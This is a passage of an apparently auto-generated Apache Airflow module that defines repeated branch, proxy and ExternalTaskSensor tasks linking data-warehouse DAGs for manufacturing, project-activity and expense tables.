BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
def branch_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER","D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER","D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
my_taskid = "BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_SCM",
external_task_id="SDM_ORG_HIER",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V","D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V","D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V"
D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="MV_PROJECT_ACTIVITY_V",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE","D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE","D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE"
D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_PROD_DEV_MLST_DELAY_RATE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME"
D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_CDOC_PLANNED_DEV_TIME",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME)
def branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME","D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME"
D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_CDOC_DELAY_TIME",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP","D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP","D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP"
D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_ECN_CASE_AFTER_MP",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST"
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_EPR_MFG_CONVERSION_COST",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST)
def branch_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_TOOLING_TOTAL_EXPENSE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP(**context):
    # Decide whether this run should wait on the upstream task (sensor path)
    # or skip straight to the proxy. The same pattern repeats for every
    # cross-DAG dependency in this module.
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_PRD")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # Non-standard schedule interval: only sense when both DAGs share the
        # exact same interval.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP", "D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        # Upstream runs at least as often as this DAG: sense only when the
        # execution dates line up.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP", "D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]
    return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"]

my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP"
D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_SDM_PRD",
    external_task_id="SDM_DMST_AND_INTL_TRAVEL_EXP",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP)
def branch_D_DM_PRDxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG", "D_DM_PRDxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG", "D_DM_PRDxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_DM_PRDxD_STG_INIT__SYS_STS_STG,
    dag=D_DM_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_DM_PRD,
)
# Cross-DAG sensor
my_taskid = "D_DM_PRDxD_STG_INIT__SYS_STS_STG"
D_DM_PRDxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_DM_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_DM_PRDxD_STG_INIT__SYS_STS_STG)
